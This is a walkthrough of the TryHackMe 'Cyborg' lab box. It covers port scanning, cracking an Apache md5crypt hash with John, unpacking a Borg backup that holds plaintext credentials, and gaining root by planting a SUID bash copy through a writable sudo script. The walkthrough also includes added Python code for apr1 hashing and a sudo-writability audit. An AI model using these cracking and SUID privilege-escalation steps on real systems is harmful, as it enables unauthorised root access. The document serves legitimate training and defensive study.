TryHackMe-Room: Cyborg
Information on this box: a box involving encrypted archives, source code analysis and more.
Step 1: Scanning
After my nmap scan, I have these results:
nmap -Pn -A 10.10.176.158 -vvv
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
| 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have two ports open: 22 (SSH) and 80 (HTTP).
The SSH version has no known vulnerability we can use, at least for the moment!
Step 2: Enumeration
Now navigate to HTTP port:
Nothing interesting here! All we learn is that it's an Ubuntu machine. I also looked at the page source (Ctrl+U), but found nothing! So I ran a Gobuster scan on the box and found two interesting directories: /admin and /etc.
Here is the content of each.
In the /admin directory I found a file named archive.tar, which I downloaded,
and a very interesting paragraph: "Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier. I decided to give up like i always do ahahaha sorry about that. I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process. Might pass it over to the IT guys but in the meantime all the config files are laying about. And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol. Other than that im pretty sure my backup "music_archive" is safe just to confirm."
It seems to be talking about a certain "music_archive"!
In the /etc directory I found a password hash:
music_archive:$apr1$BpZ.Q.1m$REDACTEDOVQTTn.
Let's save it in a file "crackme.txt" and use John the Ripper to crack it with the command:
┌──(root㉿BOTNET)-[~/THM/Cyborg]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt crackme.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward (music_archive)
1g 0:00:00:02 DONE (2024-02-09 20:54) 0.4739g/s 18472p/s 18472c/s 18472C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
OK! We have the password for "music_archive"!
Let's go back to the tar archive "archive.tar" that I downloaded. I extracted it with the command:
tar -xvf archive.tar
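To show what John is actually computing here, this is an added example (not from the original writeup) that implements the $apr1$ md5crypt variant used by htpasswd in plain Python and verifies a candidate password against a hash. The salt is the one from the hash found in /etc and the password is the one John recovered; the hash value is produced by the function itself. The fixed 1000 MD5 rounds with no memory cost are why such hashes fall to a wordlist in seconds; for new htpasswd files, htpasswd -B (bcrypt) is the stronger choice.

```python
import hashlib
import secrets

# Base-64-style alphabet used by crypt(3)-family hashes
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _to64(value, count):
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out

def apr1_crypt(password, salt, magic="$apr1$"):
    """Apache's $apr1$ variant of md5crypt, the scheme behind the hash found in /etc."""
    pw, sl, mg = password.encode(), salt[:8].encode(), magic.encode()
    ctx = hashlib.md5(pw + mg + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    n = len(pw)
    while n > 0:                      # mix in the alternate sum, 16 bytes at a time
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                          # one byte per bit of the password length
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):             # fixed 1000 rounds: no memory cost, cheap to brute-force
        h = hashlib.md5()
        h.update(pw if i & 1 else final)
        if i % 3:
            h.update(sl)
        if i % 7:
            h.update(pw)
        h.update(final if i & 1 else pw)
        final = h.digest()
    out = ""                          # crypt's byte permutation before encoding
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return f"{magic}{sl.decode()}${out}"

def apr1_verify(password, hashed):
    """Constant-time check of a candidate password against a $apr1$ or $1$ hash."""
    magic, salt, _ = hashed.split("$")[1:]
    return secrets.compare_digest(apr1_crypt(password, salt, f"${magic}$"), hashed)

# Salt from the hash found on the box, password from the John result above
SAMPLE_HASH = apr1_crypt("squidward", "BpZ.Q.1m")
```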
It gives us: home/field/dev/final_archive/
So we have a username, field, and we notice the directory final_archive!
Inside it I noticed a README file and opened it!
It talks about Borg backups! If I remember correctly, the note also mentioned a backup called "music_archive".
Let's do a little research on Borg!
What is Borg?
BorgBackup (short: Borg) is a deduplicating backup program. Optionally, it supports compression and authenticated encryption.
The main goal of Borg is to provide an efficient and secure way to backup data. The data deduplication technique used makes Borg suitable for daily backups since only changes are stored. The authenticated encryption technique makes it suitable for backups to not fully trusted targets.
First, let's install Borg with:
apt install borgbackup
Next, the README points to the borgbackup documentation. I went there and found:
# Extract entire archive
$ borg extract /path/to/repo::my-files
# Extract entire archive and list files while processing
$ borg extract --list /path/to/repo::my-files
# Verify whether an archive could be successfully extracted, but do not write files to disk
$ borg extract --dry-run /path/to/repo::my-files
# Extract the "src" directory
$ borg extract /path/to/repo::my-files home/USERNAME/src
# Extract the "src" directory but exclude object files
$ borg extract /path/to/repo::my-files home/USERNAME/src --exclude '*.o'
# Restore a raw device (must not be active/in use/mounted at that time)
$ borg extract --stdout /path/to/repo::my-sdx | dd of=/dev/sdx bs=10M
in the official documentation. I used the first form:
borg extract /path/to/repo::my-files
borg extract home/field/dev/final_archive/::music_archive
Be sure to run it from the directory that contains the extracted home directory!
Then I'm prompted for the passphrase (the password we cracked), and that's it!
I go back to the home folder and use the "tree" command:
┌──(root㉿BOTNET)-[~/THM/Cyborg/home]
└─# tree
.
|-- alex
|   |-- Desktop
|   |   `-- secret.txt
|   |-- Documents
|   |   `-- note.txt
|   |-- Downloads
|   |-- Music
|   |-- Pictures
|   |-- Public
|   |-- Templates
|   `-- Videos
`-- field
    `-- dev
        `-- final_archive
            |-- README
            |-- config
            |-- data
            |   `-- 0
            |       |-- 1
            |       |-- 3
            |       |-- 4
            |       `-- 5
            |-- hints.5
            |-- index.5
            |-- integrity.5
            `-- nonce

15 directories, 12 files
Yes, I know, the suspicious files are secret.txt and note.txt! Let's look at them.
The only interesting one is note.txt in /home/alex/Documents, which contains credentials:
┌──(root㉿BOTNET)-[~/…/Cyborg/home/alex/Documents]
└─# cat note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:REDACTED
We have Alex's credentials! The first thing that comes to mind is an SSH connection.
┌──(root㉿BOTNET)-[~/…/Cyborg/home/alex/Documents]
└─# ssh alex@10.10.176.158
The authenticity of host '10.10.176.158 (10.10.176.158)' can't be established.
ED25519 key fingerprint is SHA256:hJwt8CvQHRU+h3WUZda+Xuvsp1/od2FFuBvZJJvdSHs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.176.158' (ED25519) to the list of known hosts.
alex@10.10.176.158's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
27 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
alex@ubuntu:~$
I'm logged in as Alex and can read user.txt:
cat user.txt
Step 3: Privilege Escalation
Now the privesc. Let's see what sudo lets us run:
sudo -l
We can run this script as any user without a password! Isn't that great!
Now let's look at our permissions on the file:
We see that user alex is the owner of the file! So we can modify the script as we like.
Instead of a reverse shell we're going to do something else today.
I will add this code to the script. Since the script is executed as root, the code we add runs as root too, so we use it to copy /bin/bash and set the SUID bit on the copy. A SUID file runs with the privileges of its owner (here root) rather than those of the user who launches it:
cp /bin/bash ./ && chmod +s bash
Then we change the permissions to the script:
chmod 700 /etc/mp3backups/backup.sh
and run the script with sudo:
sudo /etc/mp3backups/backup.sh
We don't notice anything,
but just run:
ls -la
We notice a bash file with the SUID bit set and owned by root!
So if I run the command:
./bash -p
I'm still alex but with the euid and egid of root:
So I could use all commands as root, but to get a prettier shell (which many people skip afterwards), if Python is installed on the machine you can do:
bash-4.3# python
Python 2.7.12 (default, Oct 5 2020, 13:56:01)
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.setgid(0)
>>> os.system("/bin/bash -p")
root@ubuntu:~#
This is prettier, too!
Finally we can read the "root.txt" file:
cat root.txt
Thank you for reading!
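As an added example (not part of the original writeup), here is a small Python audit for the root cause of this privesc: a sudo rule pointing at a script that the invoking user can modify. The `sudo -l` output and the owner/mode values below are constructed to mirror the writeup (alex's uid 1000 is an assumption); `live_stats` reads the real filesystem when you run the audit on a host.

```python
import os
import re
import stat

# Matches the command lines of `sudo -l`, e.g. "(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh"
SUDO_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")

def parse_sudo_l(output):
    """Return (runas, nopasswd, path) for every command line in `sudo -l` output."""
    entries = []
    for line in output.splitlines():
        m = SUDO_LINE.match(line)
        if m:
            tags = m.group("tags").replace(" ", "").split(":")
            entries.append((m.group("runas").strip(), "NOPASSWD" in tags, m.group("cmd")))
    return entries

def user_can_write(uid, gids, st_uid, st_gid, st_mode):
    """Could a user with this uid/gids change the file? The owner always can (chmod)."""
    if uid == st_uid:
        return True
    if st_gid in gids and st_mode & stat.S_IWGRP:
        return True
    return bool(st_mode & stat.S_IWOTH)

def live_stats(paths):
    """Collect (st_uid, st_gid, st_mode) for existing paths on the real filesystem."""
    found = {}
    for p in paths:
        if os.path.exists(p):
            s = os.stat(p)
            found[p] = (s.st_uid, s.st_gid, s.st_mode)
    return found

def audit(sudo_output, file_stats, uid, gids):
    """file_stats maps path -> (st_uid, st_gid, st_mode). Returns (path, reason) findings."""
    findings = []
    for runas, nopasswd, path in parse_sudo_l(sudo_output):
        if path not in file_stats:
            findings.append((path, "sudo target does not exist"))
        elif user_can_write(uid, gids, *file_stats[path]):
            why = "writable by the invoking user, runs as (%s)%s" % (runas, " without password" if nopasswd else "")
            findings.append((path, why))
    return findings

# Constructed sample modelled on the writeup: alex (assumed uid 1000) owns the script sudo runs as root.
SAMPLE_SUDO_L = "User alex may run the following commands on ubuntu:\n    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh\n"
SAMPLE_STATS = {"/etc/mp3backups/backup.sh": (1000, 1000, 0o100755)}
```

On a live host, pass `live_stats([p for _, _, p in parse_sudo_l(output)])` as `file_stats` together with `os.getuid()` and `os.getgroups()`; a clean result means every sudo target is owned by root and not group- or world-writable.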